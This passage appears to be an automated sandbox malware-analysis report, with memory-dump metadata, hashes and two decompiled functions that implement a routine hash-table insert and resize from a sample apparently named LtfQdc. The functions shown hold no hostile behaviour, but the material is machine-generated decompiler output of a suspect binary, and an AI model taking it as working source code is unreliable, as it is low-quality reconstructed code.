0x00ccf81e
0x00ccf820
0x00ccf822
0x00ccf825
0x00ccf849
0x00ccf849
0x00ccf849
0x00ccf849
0x00ccf84c
0x00000000
0x00ccf84c
0x00ccf827
0x00ccf82a
0x00ccf82a
0x00ccf82d
0x00ccf82f
0x00ccf835
0x00ccf837
0x00ccf83b
0x00ccf83b
0x00ccf83d
0x00ccf83f
0x00ccf83f
0x00ccf831
0x00ccf831
0x00ccf831
0x00ccf845
0x00ccf845
0x00ccf847
0x00ccf847
0x00000000
0x00ccf847
0x00ccf809
0x00ccf80b
0x00000000
0x00ccf80b
0x00ccf710
0x00ccf715
0x00ccf71d
0x00ccf725
0x00ccf729
0x00ccf72e
0x00ccf732
0x00ccf737
0x00ccf73c
0x00ccf73f
0x00ccf744
0x00ccf74a
0x00ccf752
0x00ccf75b
0x00ccf75d
0x00ccf760
0x00ccf7b5
0x00ccf7b5
0x00ccf7b8
0x00ccf7bd
0x00ccf7bd
0x00ccf7c0
0x00ccf7c3
0x00ccf7c5
0x00ccf7c8
0x00ccf7ca
0x00000000
0x00000000
0x00000000
0x00ccf7ca
0x00ccf796
0x00ccf799
0x00ccf79c
0x00000000
0x00000000
0x00ccf79e
0x00ccf7a1
0x00ccf7a4
0x00ccf7b1
0x00ccf7b1
0x00000000
0x00ccf7a1
0x00ccf704
0x00ccf657
0x00ccf65b
0x00ccf65f
0x00ccf663
0x00ccf666
0x00ccf66a
0x00ccf66e
0x00ccf671
0x00000000
0x00000000
0x00000000
0x00ccf54b
0x00ccf578
0x00ccf580
0x00ccf586
0x00ccf589
0x00ccf59c
0x00ccf59f
0x00ccf5a1
0x00ccf5a3
0x00ccf5a9
0x00ccf5a9
0x00ccf5ac
0x00ccf5ae
0x00ccf5b1
0x00ccf5b1
0x00ccf58b
0x00ccf58b
0x00ccf58e
0x00ccf591
0x00ccf591
0x00ccf5b6
0x00ccf5bb
0x00ccf601
0x00ccf601
0x00000000
0x00ccf601
0x00ccf5c1
0x00ccf5c4
0x00ccf5e0
0x00ccf5e0
0x00ccf5e4
0x00000000
0x00000000
0x00ccf5e6
0x00ccf5e6
0x00ccf5eb
0x00ccf5d7
0x00ccf5da
0x00ccf6e5
0x00ccf6e7
0x00ccf84e
0x00ccf84e
0x00ccf850
0x00ccf85c
0x00ccf85c
0x00000000
0x00ccf5da
0x00ccf5f0
0x00ccf5d0
0x00ccf5d0
0x00ccf5f2
0x00ccf5f4
0x00ccf5fa
0x00ccf5fc
0x00ccf5fc
0x00ccf5f4
0x00ccf5d5
0x00000000
0x00000000
0x00000000
0x00000000
0x00ccf5d5
0x00000000
0x00ccf5e0

APIs

__floor_pentium4.LIBCMT ref: 00CCF684
__floor_pentium4.LIBCMT ref: 00CCF737

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: dea0514e6a89b3b68a1dd1f1b094d7d0341fac23b4107db6ef23a01af16c73e6
Instruction ID: e25fdf701e3e190ec83fa29a0d46855a48a351ce16fa9896208d179f02120702
Opcode Fuzzy Hash: dea0514e6a89b3b68a1dd1f1b094d7d0341fac23b4107db6ef23a01af16c73e6
Instruction Fuzzy Hash: 32A19172A006158FCB15CF69C880B6EB7B3AFD5310B29C66DD815EB354E731ED828B91

Uniqueness

Uniqueness Score: -1.00%

Function 00CFD1E0 Relevance: 3.3, APIs: 2, Instructions: 270
COMMONCrypto

Download Yara Rule

C-Code - Quality: 27%

			E00CFD1E0(signed int __ecx, intOrPtr __fp0, signed int** _a4, signed int* _a8, signed int* _a12) {
				intOrPtr* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t98;
				signed int _t101;
				signed int* _t102;
				signed int _t104;
				signed int _t110;
				signed int _t112;
				signed int _t125;
				void* _t128;
				signed int _t132;
				signed int* _t133;
				signed int** _t134;
				signed int _t135;
				signed int _t137;
				signed int _t139;
				intOrPtr _t140;
				signed int _t141;
				signed int _t150;
				unsigned int _t161;
				intOrPtr* _t162;
				signed int _t165;
				signed int _t186;
				intOrPtr _t187;
				unsigned int _t188;
				signed int _t189;
				unsigned int _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int** _t196;
				signed int _t197;
				signed int* _t199;
				intOrPtr _t210;

				_t210 = __fp0;
				_t135 = __ecx;
				_v20 = __ecx;
				_t132 =  *( *_a8 + 0xc);
				_t161 =  *(__ecx + 4);
				_v24 = _t161;
				_v28 = _t132;
				if(_t161 == 0) {
					_t193 = 0xffffffff;
					L16:
					 *_t199 = 0xc;
					_t133 = L00CFDBBC();
					_t133[2] =  *_a12;
					_t133[1] = _v28;
					 *_t133 = 0;
					_t162 = _v20;
					asm("movq xmm2, [0xd30dd0]");
					asm("movd xmm0, eax");
					asm("por xmm0, xmm2");
					asm("subsd xmm0, xmm2");
					asm("cvtsd2ss xmm0, xmm0");
					asm("movss xmm1, [edx+0x10]");
					_t186 = _v24;
					__eflags = _t186;
					if(__eflags == 0) {
						L18:
						asm("divss xmm0, xmm1");
						asm("cvtss2sd xmm0, xmm0");
						asm("movsd [esp], xmm0");
						_t93 = E00D236A0(_t135);
						_v40 = _t210;
						asm("movss xmm0, [ebp-0x24]");
						asm("cvttss2si eax, xmm0");
						asm("subss xmm0, [0xd30dd8]");
						asm("cvttss2si ecx, xmm0");
						_t137 = _t135 & _t93 >> 0x0000001f | _t93;
						_t165 = _t186 + _t186;
						_t94 = 1;
						__eflags = _t186 - 3;
						if(_t186 >= 3) {
							_t197 = _t186 - 1;
							__eflags = _t186 & _t197;
							_t42 = (_t186 & _t197) != 0;
							__eflags = _t42;
							_t94 = 0 | _t42;
						}
						_t95 = _t94 | _t165;
						__eflags = _t95 - _t137;
						_t96 =  <=  ? _t137 : _t95;
						_t194 = 2;
						__eflags = _t96 - 1;
						_t187 = _v20;
						if(_t96 != 1) {
							_t44 = _t96 - 1; // -1
							_t137 = _t44;
							__eflags = _t96 & _t137;
							if((_t96 & _t137) != 0) {
								 *_t199 = _t96;
								_t96 = E00C9A3AC(_t133, _t187);
								_t187 = _v20;
							}
							_t194 = _t96;
						}
						_t48 = _t187 + 4; // 0x7d8b0870
						_t188 =  *_t48;
						__eflags = _t194 - _t188;
						if(__eflags > 0) {
							L33:
							 *_t199 = _t194;
							L00CBDCB0(_v20, _t210);
							goto L34;
						} else {
							if(__eflags >= 0) {
								L34:
								_t162 = _v20;
								_t54 = _t162 + 4; // 0x7d8b0870
								_t139 =  *_t54;
								_t55 = _t139 - 1; // 0x7d8b086f
								_t195 = _t55;
								__eflags = _t139 & _t195;
								_v24 = _t139;
								if((_t139 & _t195) != 0) {
									_t193 = _v28;
									__eflags = _t193 - _t139;
									if(_t193 >= _t139) {
										_t62 = _t193 % _t139;
										__eflags = _t62;
										_t193 = _t62;
									}
								} else {
									_t193 = _t195 & _v28;
								}
								L38:
								_t140 =  *_t162;
								_t98 =  *(_t140 + _t193 * 4);
								__eflags = _t98;
								if(_t98 == 0) {
									_t68 = _t162 + 8; // 0x74fe3908
									 *_t133 =  *_t68;
									_t69 = _t162 + 8; // 0xcfd1a8
									 *(_t162 + 8) = _t133;
									 *(_t140 + _t193 * 4) = _t69;
									_t101 =  *_t133;
									__eflags = _t101;
									_t196 = _a4;
									if(_t101 == 0) {
										L47:
										_t83 = _t162 + 0xc;
										 *_t83 =  *(_t162 + 0xc) + 1;
										__eflags =  *_t83;
										_t102 = 1;
										L48:
										 *_t196 = _t133;
										_t196[1] = _t102;
										return _t196;
									}
									_t74 = _t101 + 4; // 0x74ff8514
									_t104 =  *_t74;
									_t189 = _v24;
									_t141 = _t189 - 1;
									__eflags = _t189 & _t141;
									if((_t189 & _t141) != 0) {
										__eflags = _t104 - _t189;
										if(_t104 >= _t189) {
											_t80 = _t104 % _t189;
											__eflags = _t80;
											_t104 = _t80;
										}
									} else {
										_t104 = _t104 & _t141;
									}
									_t98 = (_t104 << 2) +  *_t162;
									__eflags = _t98;
									L46:
									 *_t98 = _t133;
									goto L47;
								}
								 *_t133 =  *_t98;
								_t196 = _a4;
								goto L46;
							}
							asm("movss xmm0, [eax+0xc]");
							asm("orpd xmm0, [0xd30de0]");
							asm("subsd xmm0, [0xd30dd0]");
							asm("cvtsd2ss xmm0, xmm0");
							asm("divss xmm0, [eax+0x10]");
							asm("cvtss2sd xmm0, xmm0");
							asm("movsd [esp], xmm0");
							_t110 = E00D236A0(_t137);
							_v36 = _t210;
							asm("movss xmm0, [ebp-0x20]");
							asm("cvttss2si ecx, xmm0");
							asm("subss xmm0, [0xd30dd8]");
							asm("cvttss2si eax, xmm0");
							_t112 = _t110 & _t137 >> 0x0000001f | _t137;
							__eflags = _t188 - 3;
							if(_t188 < 3) {
								L31:
								 *_t199 = _t112;
								_t112 = E00C9A3AC(_t133, _t188);
								L32:
								__eflags = _t194 - _t112;
								_t194 =  <=  ? _t112 : _t194;
								__eflags = _t194 - _t188;
								if(_t194 >= _t188) {
									goto L34;
								}
								goto L33;
							}
							_t150 = (((_t188 - (_t188 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t188 - (_t188 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t188 - (_t188 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t188 - (_t188 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
							__eflags = _t150 - 1;
							if(_t150 > 1) {
								goto L31;
							}
							__eflags = _t112 - 2;
							if(_t112 >= 2) {
								asm("bsr ecx, eax");
								_t112 = 1 <<  ~(_t150 ^ 0x0000001f);
							}
							goto L32;
						}
					}
					asm("movd xmm3, edi");
					asm("por xmm3, xmm2");
					asm("subsd xmm3, xmm2");
					asm("xorps xmm2, xmm2");
					asm("cvtsd2ss xmm2, xmm3");
					asm("mulss xmm2, xmm1");
					asm("ucomiss xmm0, xmm2");
					if(__eflags <= 0) {
						goto L38;
					}
					goto L18;
				}
				_t135 = ((_t161 - (_t161 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t161 - (_t161 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t161 - (_t161 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t161 - (_t161 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f;
				_t192 = _t135 * 0x1010101 >> 0x18;
				if(_t192 > 1) {
					_t193 = _t132;
					__eflags = _t132 - _t161;
					if(_t132 >= _t161) {
						_t10 = _t132 % _v24;
						__eflags = _t10;
						_t193 = _t10;
					}
				} else {
					_t193 = _t161 - 0x00000001 & _t132;
				}
				_t134 =  *( *_v20 + _t193 * 4);
				if(_t134 == 0) {
					goto L16;
				}
				_v32 = _v24 - 1;
				while(1) {
					_t133 =  *_t134;
					if(_t133 == 0) {
						goto L16;
					}
					_t125 = _t133[1];
					if(_t125 == _v28) {
						L10:
						_t135 = _t133[2];
						 *_t199 =  *_a8;
						_t128 = E00CF3090(_t133, _t135, _t192, _t193);
						_t199 = _t199 - 4;
						if(_t128 != 0) {
							_t102 = 0;
							_t196 = _a4;
							goto L48;
						}
						continue;
					}
					if(_t192 <= 1) {
						_t125 = _t125 & _v32;
						__eflags = _t125;
					} else {
						_t135 = _v24;
						if(_t125 >= _t135) {
							_t125 = _t125 % _t135;
						}
					}
					if(_t125 != _t193) {
						goto L16;
					} else {
						goto L10;
					}
				}
				goto L16;
			}

0x00cfd1e0
0x00cfd1e0
0x00cfd1e9
0x00cfd1f1
0x00cfd1f4
0x00cfd1f9
0x00cfd1fc
0x00cfd1ff
0x00cfd243
0x00cfd2b4
0x00cfd2b7
0x00cfd2c3
0x00cfd2c7
0x00cfd2cd
0x00cfd2d0
0x00cfd2d6
0x00cfd2dd
0x00cfd2e5
0x00cfd2e9
0x00cfd2ed
0x00cfd2f1
0x00cfd2f5
0x00cfd2fa
0x00cfd2fd
0x00cfd2ff
0x00cfd321
0x00cfd321
0x00cfd325
0x00cfd329
0x00cfd32e
0x00cfd333
0x00cfd336
0x00cfd33b
0x00cfd341
0x00cfd34c
0x00cfd352
0x00cfd354
0x00cfd357
0x00cfd35c
0x00cfd35f
0x00cfd361
0x00cfd366
0x00cfd368
0x00cfd368
0x00cfd368
0x00cfd368
0x00cfd36b
0x00cfd36d
0x00cfd36f
0x00cfd372
0x00cfd377
0x00cfd37a
0x00cfd37d
0x00cfd37f
0x00cfd37f
0x00cfd382
0x00cfd384
0x00cfd386
0x00cfd389
0x00cfd38e
0x00cfd38e
0x00cfd391
0x00cfd391
0x00cfd393
0x00cfd393
0x00cfd396
0x00cfd398
0x00cfd467
0x00cfd467
0x00cfd46d
0x00000000
0x00cfd39e
0x00cfd39e
0x00cfd475
0x00cfd475
0x00cfd478
0x00cfd478
0x00cfd47b
0x00cfd47b
0x00cfd47e
0x00cfd480
0x00cfd483
0x00cfd48a
0x00cfd48d
0x00cfd48f
0x00cfd497
0x00cfd497
0x00cfd499
0x00cfd499
0x00cfd485
0x00cfd485
0x00cfd485
0x00cfd49d
0x00cfd49d
0x00cfd49f
0x00cfd4a2
0x00cfd4a4
0x00cfd4af
0x00cfd4b2
0x00cfd4b4
0x00cfd4b7
0x00cfd4ba
0x00cfd4bd
0x00cfd4bf
0x00cfd4c1
0x00cfd4c4
0x00cfd4ec
0x00cfd4ec
0x00cfd4ec
0x00cfd4ec
0x00cfd4ef
0x00cfd4f1
0x00cfd4f1
0x00cfd4f3
0x00cfd4ff
0x00cfd4ff
0x00cfd4c6
0x00cfd4c6
0x00cfd4c9
0x00cfd4cc
0x00cfd4cf
0x00cfd4d1
0x00cfd4d7
0x00cfd4d9
0x00cfd4df
0x00cfd4df
0x00cfd4e1
0x00cfd4e1
0x00cfd4d3
0x00cfd4d3
0x00cfd4d3
0x00cfd4e8
0x00cfd4e8
0x00cfd4ea
0x00cfd4ea
0x00000000
0x00cfd4ea
0x00cfd4a8
0x00cfd4aa
0x00000000
0x00cfd4aa
0x00cfd3a7
0x00cfd3ac
0x00cfd3b4
0x00cfd3bc
0x00cfd3c0
0x00cfd3c5
0x00cfd3c9
0x00cfd3ce
0x00cfd3d3
0x00cfd3d6
0x00cfd3db
0x00cfd3e1
0x00cfd3e9
0x00cfd3f2
0x00cfd3f4
0x00cfd3f7
0x00cfd456
0x00cfd456
0x00cfd459
0x00cfd45e
0x00cfd45e
0x00cfd460
0x00cfd463
0x00cfd465
0x00000000
0x00000000
0x00000000
0x00cfd465
0x00cfd42d
0x00cfd430
0x00cfd433
0x00000000
0x00000000
0x00cfd435
0x00cfd438
0x00cfd43b
0x00cfd448
0x00cfd448
0x00000000
0x00cfd438
0x00cfd398
0x00cfd301
0x00cfd305
0x00cfd309
0x00cfd30d
0x00cfd310
0x00cfd314
0x00cfd318
0x00cfd31b
0x00000000
0x00000000
0x00000000
0x00cfd31b
0x00cfd228
0x00cfd234
0x00cfd23a
0x00cfd24a
0x00cfd24c
0x00cfd24e
0x00cfd254
0x00cfd254
0x00cfd257
0x00cfd257
0x00cfd23c
0x00cfd23f
0x00cfd23f
0x00cfd25e
0x00cfd263
0x00000000
0x00000000
0x00cfd269
0x00cfd292
0x00cfd292
0x00cfd296
0x00000000
0x00000000
0x00cfd298
0x00cfd29e
0x00cfd277
0x00cfd27c
0x00cfd27f
0x00cfd282
0x00cfd287
0x00cfd28c
0x00cfd44c
0x00cfd44e
0x00000000
0x00cfd44e
0x00000000
0x00cfd28c
0x00cfd2a3
0x00cfd270
0x00cfd270
0x00cfd2a5
0x00cfd2a5
0x00cfd2aa
0x00cfd2b0
0x00cfd2b0
0x00cfd2aa
0x00cfd275
0x00000000
0x00000000
0x00000000
0x00000000
0x00cfd275
0x00000000

APIs

__floor_pentium4.LIBCMT ref: 00CFD32E
__floor_pentium4.LIBCMT ref: 00CFD3CE

Memory Dump Source

Source File: 00000012.00000002.509560894.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000012.00000002.509547932.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510364517.0000000000D26000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510918412.0000000000D40000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510946033.0000000000D41000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.510965056.0000000000D42000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511047291.0000000000D51000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511074426.0000000000D5A000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000012.00000002.511130527.0000000000D5B000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_c80000_LtfQdc.jbxd

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 81f51dc7201dd004f01aeda77a152c607d40d1947651b6eebfaf11e6760f19ab
Instruction ID: 6245e67ec98be79e11e802250b58c636c0e569b1bc0f0dcd2a1e73c69f3adfa7
Opcode Fuzzy Hash: 81f51dc7201dd004f01aeda77a152c607d40d1947651b6eebfaf11e6760f19ab
Instruction Fuzzy Hash: ADA1D472A146198BCB59CF69C48127DF7B3AF99310B19C629D916EB350D730ED81CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00CBF250 Relevance: 3.3, APIs: 2, Instructions: 266
COMMONCrypto

Download Yara Rule

C-Code - Quality: 22%

			E00CBF250(signed int __ecx, intOrPtr __fp0, signed int** _a4, intOrPtr* _a8, signed int** _a16) {
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				void* __edi;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t100;
				signed int _t102;
				signed int _t105;
				signed int* _t106;
				signed int _t108;
				signed int _t113;
				signed int _t115;
				unsigned int _t124;
				signed int _t128;
				signed int* _t132;
				signed int** _t133;
				signed int _t134;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t146;
				signed int _t149;
				signed int _t152;
				void* _t153;
				signed int _t154;
				signed int _t171;
				signed int _t181;
				unsigned int _t186;
				unsigned int _t187;
				unsigned int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int** _t193;
				signed int _t194;
				signed int* _t196;
				intOrPtr _t207;

				_t207 = __fp0;
				_t134 = __ecx;
				_v24 =  *_a8;
				_t186 =  *(__ecx + 4);
				_v20 = __ecx;
				if(_t186 == 0) {
					_t190 = 0xffffffff;
					L17:
					 *_t196 = 0x18;
					_t132 = L00CFDBBC();
					_t132[2] =  *( *_a16);
					_t33 =  &(_t132[3]); // 0xc
					E00CBA7D0(_t33);
					_t132[1] = _v24;
					 *_t132 = 0;
					_t136 = _v20;
					asm("movq xmm2, [0xd30dd0]");
					asm("movd xmm0, eax");
					asm("por xmm0, xmm2");
					asm("subsd xmm0, xmm2");
					asm("cvtsd2ss xmm0, xmm0");
					asm("movss xmm1, [ecx+0x10]");
					__eflags = _t186;
					if(__eflags == 0) {
						L19:
						asm("divss xmm0, xmm1");
						asm("cvtss2sd xmm0, xmm0");
						asm("movsd [esp], xmm0");
						_t97 = E00D236A0(_t136);
						_v40 = _t207;
						asm("movss xmm0, [ebp-0x24]");
						asm("cvttss2si eax, xmm0");
						asm("subss xmm0, [0xd30dd8]");
						asm("cvttss2si ecx, xmm0");
						_t138 = _t136 & _t97 >> 0x0000001f | _t97;
						_t152 = _t186 + _t186;
						_t98 = 1;
						__eflags = _t186 - 3;
						if(_t186 >= 3) {
							_t194 = _t186 - 1;
							__eflags = _t186 & _t194;
							_t44 = (_t186 & _t194) != 0;
							__eflags = _t44;
							_t98 = 0 | _t44;
						}
						_t99 = _t98 | _t152;
						__eflags = _t99 - _t138;
						_t100 =  <=  ? _t138 : _t99;
						_t191 = 2;
						__eflags = _t100 - 1;
						_t139 = _v20;
						if(_t100 != 1) {
							_t46 = _t100 - 1; // -1
							_t171 = _t46;
							__eflags = _t100 & _t171;
							if((_t100 & _t171) != 0) {
								 *_t196 = _t100;
								_t100 = E00C9A3AC(_t132, _t186);
								_t139 = _v20;
							}
							_t191 = _t100;
						}
						_t187 =  *(_t139 + 4);
						__eflags = _t191 - _t187;
						if(__eflags > 0) {
							L34:
							 *_t196 = _t191;
							L00CBDCB0(_t139, _t207);
							_t139 = _v20;
							goto L35;
						} else {
							if(__eflags >= 0) {
								L35:
								_t186 =  *(_t139 + 4);
								_t192 = _t186 - 1;
								__eflags = _t186 & _t192;
								if((_t186 & _t192) != 0) {
									_t190 = _v24;
									__eflags = _t190 - _t186;
									if(_t190 >= _t186) {
										_t62 = _t190 % _t186;
										__eflags = _t62;
										_t190 = _t62;
										_t139 = _v20;
									}
								} else {
									_t190 = _t192 & _v24;
								}
								L39:
								_t153 =  *_t139;
								_t102 =  *(_t153 + _t190 * 4);
								__eflags = _t102;
								if(_t102 == 0) {
									 *_t132 =  *(_t139 + 8);
									_t70 = _t139 + 8; // 0x8
									 *(_t139 + 8) = _t132;
									 *(_t153 + _t190 * 4) = _t70;
									_t105 =  *_t132;
									__eflags = _t105;
									_t193 = _a4;
									if(_t105 == 0) {
										L48:
										_t84 = _t139 + 0xc;
										 *_t84 =  *(_t139 + 0xc) + 1;
										__eflags =  *_t84;
										_t106 = 1;
										L49:
										 *_t193 = _t132;
										_t193[1] = _t106;
										return _t193;
									}
									_t108 =  *(_t105 + 4);
									_t154 = _t186 - 1;
									__eflags = _t186 & _t154;
									if((_t186 & _t154) != 0) {
										__eflags = _t108 - _t186;
										if(_t108 >= _t186) {
											_t80 = _t108 % _t186;
											__eflags = _t80;
											_t108 = _t80;
											_t139 = _v20;
										}
									} else {
										_t108 = _t108 & _t154;
									}
									_t102 = (_t108 << 2) +  *_t139;
									__eflags = _t102;
									L47:
									 *_t102 = _t132;
									goto L48;
								}
								 *_t132 =  *_t102;
								_t193 = _a4;
								goto L47;
							}
							asm("movss xmm0, [ecx+0xc]");
							asm("orpd xmm0, [0xd30de0]");
							asm("subsd xmm0, [0xd30dd0]");
							asm("cvtsd2ss xmm0, xmm0");
							asm("divss xmm0, [ecx+0x10]");
							asm("cvtss2sd xmm0, xmm0");
							asm("movsd [esp], xmm0");
							_t113 = E00D236A0(_t139);
							_v36 = _t207;
							asm("movss xmm0, [ebp-0x20]");
							asm("cvttss2si ecx, xmm0");
							asm("subss xmm0, [0xd30dd8]");
							asm("cvttss2si eax, xmm0");
							_t115 = _t113 & _t139 >> 0x0000001f | _t139;
							__eflags = _t187 - 3;
							if(_t187 < 3) {
								L32:
								 *_t196 = _t115;
								_t115 = E00C9A3AC(_t132, _t187);
								L33:
								_t139 = _v20;
								__eflags = _t191 - _t115;
								_t191 =  <=  ? _t115 : _t191;
								__eflags = _t191 - _t187;
								if(_t191 >= _t187) {
									goto L35;
								}
								goto L34;
							}
							_t146 = (((_t187 - (_t187 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t187 - (_t187 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t187 - (_t187 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t187 - (_t187 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
							__eflags = _t146 - 1;
							if(_t146 > 1) {
								goto L32;
							}
							__eflags = _t115 - 2;
							if(_t115 >= 2) {
								asm("bsr ecx, eax");
								_t115 = 1 <<  ~(_t146 ^ 0x0000001f);
							}
							goto L33;
						}
					}
					asm("movd xmm3, edi");
					asm("por xmm3, xmm2");
					asm("subsd xmm3, xmm2");
					asm("xorps xmm2, xmm2");
					asm("cvtsd2ss xmm2, xmm3");
					asm("mulss xmm2, xmm1");
					asm("ucomiss xmm0, xmm2");
					if(__eflags <= 0) {
						goto L39;
					}
					goto L19;
				}
				_t124 = _t186;
				_t189 = (((_t186 - (_t186 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t186 - (_t186 >> 0x00000001 & 0x55555555) & 0x33333333) >> 0x00000004) + (_t186 - (_t186 >> 0x00000001 & 0x55555555) >> 0x00000002 & 0x33333333) + (_t186 - (_t186 >> 0x00000001 & 0x55555555) & 0x33333333) & 0x0f0f0f0f) * 0x1010101 >> 0x18;
				_v28 = _t124;
				if(_t189 > 1) {
					_t181 = _v24;
					_t190 = _t181;
					__eflags = _t181 - _t124;
					if(_t181 >= _t124) {
						_t11 = _t181 % _v28;
						__eflags = _t11;
						_t190 = _t11;
						_t181 = _v24;
						_t134 = _v20;
					}
				} else {
					_t181 = _v24;
					_t190 = _t124 - 0x00000001 & _t181;
				}
				_t133 =  *( *_t134 + _t190 * 4);
				if(_t133 == 0) {
					L16:
					_t186 = _v28;
					goto L17;
				}
				_v32 = _v28 - 1;
				_t149 = _v28;
				while(1) {
					_t132 =  *_t133;
					if(_t132 == 0) {
						goto L16;
					}
					_t128 = _t132[1];
					if(_t128 == _t181) {
						L10:
						if(_t132[2] == _t181) {
							_t106 = 0;
							_t193 = _a4;
							goto L49;
						}
						continue;
					}
					if(_t189 <= 1) {
						_t128 = _t128 & _v32;
						__eflags = _t128;
					} else {
						if(_t128 >= _t149) {
							_t128 = _t128 % _t149;
							_t181 = _v24;
						}
					}
					if(_t128 != _t190) {
						goto L16;
					} else {
						goto L10;
					}
				}
				goto L16;
			}

0x00cbf250
0x00cbf250
0x00cbf25e
0x00cbf261
0x00cbf266
0x00cbf269
0x00cbf2b5
0x00cbf324
0x00cbf324
0x00cbf330
0x00cbf339
0x00cbf33c
0x00cbf33f
0x00cbf347
0x00cbf34a
0x00cbf350
0x00cbf357
0x00cbf35f
0x00cbf363
0x00cbf367
0x00cbf36b
0x00cbf36f
0x00cbf374
0x00cbf376
0x00cbf398
0x00cbf398
0x00cbf39c
0x00cbf3a0
0x00cbf3a5
0x00cbf3aa
0x00cbf3ad
0x00cbf3b2
0x00cbf3b8
0x00cbf3c3
0x00cbf3c9
0x00cbf3cb
0x00cbf3ce
0x00cbf3d3
0x00cbf3d6
0x00cbf3d8
0x00cbf3dd
0x00cbf3df
0x00cbf3df
0x00cbf3df
0x00cbf3df
0x00cbf3e2
0x00cbf3e4
0x00cbf3e6
0x00cbf3e9
0x00cbf3ee
0x00cbf3f1
0x00cbf3f4
0x00cbf3f6
0x00cbf3f6
0x00cbf3f9
0x00cbf3fb
0x00cbf3fd
0x00cbf400
0x00cbf405
0x00cbf405
0x00cbf408
0x00cbf408
0x00cbf40a
0x00cbf40d
0x00cbf40f
0x00cbf4de
0x00cbf4de
0x00cbf4e1
0x00cbf4e9
0x00000000
0x00cbf415
0x00cbf415
0x00cbf4ec
0x00cbf4ec
0x00cbf4ef
0x00cbf4f2
0x00cbf4f4
0x00cbf4fb
0x00cbf4fe
0x00cbf500
0x00cbf506
0x00cbf506
0x00cbf508
0x00cbf50a
0x00cbf50a
0x00cbf4f6
0x00cbf4f6
0x00cbf4f6
0x00cbf50d
0x00cbf50d
0x00cbf50f
0x00cbf512
0x00cbf514
0x00cbf522
0x00cbf524
0x00cbf527
0x00cbf52a
0x00cbf52d
0x00cbf52f
0x00cbf531
0x00cbf534
0x00cbf558
0x00cbf558
0x00cbf558
0x00cbf558
0x00cbf55b
0x00cbf55d
0x00cbf55d
0x00cbf55f
0x00cbf56b
0x00cbf56b
0x00cbf536
0x00cbf539
0x00cbf53c
0x00cbf53e
0x00cbf544
0x00cbf546
0x00cbf54a
0x00cbf54a
0x00cbf54c
0x00cbf54e
0x00cbf54e
0x00cbf540
0x00cbf540
0x00cbf540
0x00cbf554
0x00cbf554
0x00cbf556
0x00cbf556
0x00000000
0x00cbf556
0x00cbf518
0x00cbf51a
0x00000000
0x00cbf51a
0x00cbf41b
0x00cbf420
0x00cbf428
0x00cbf430
0x00cbf434
0x00cbf439
0x00cbf43d
0x00cbf442
0x00cbf447
0x00cbf44a
0x00cbf44f
0x00cbf455
0x00cbf45d
0x00cbf466
0x00cbf468
0x00cbf46b
0x00cbf4ca
0x00cbf4ca
0x00cbf4cd
0x00cbf4d2
0x00cbf4d2
0x00cbf4d5
0x00cbf4d7
0x00cbf4da
0x00cbf4dc
0x00000000
0x00000000
0x00000000
0x00cbf4dc
0x00cbf4a1
0x00cbf4a4
0x00cbf4a7
0x00000000
0x00000000
0x00cbf4a9
0x00cbf4ac
0x00cbf4af
0x00cbf4bc
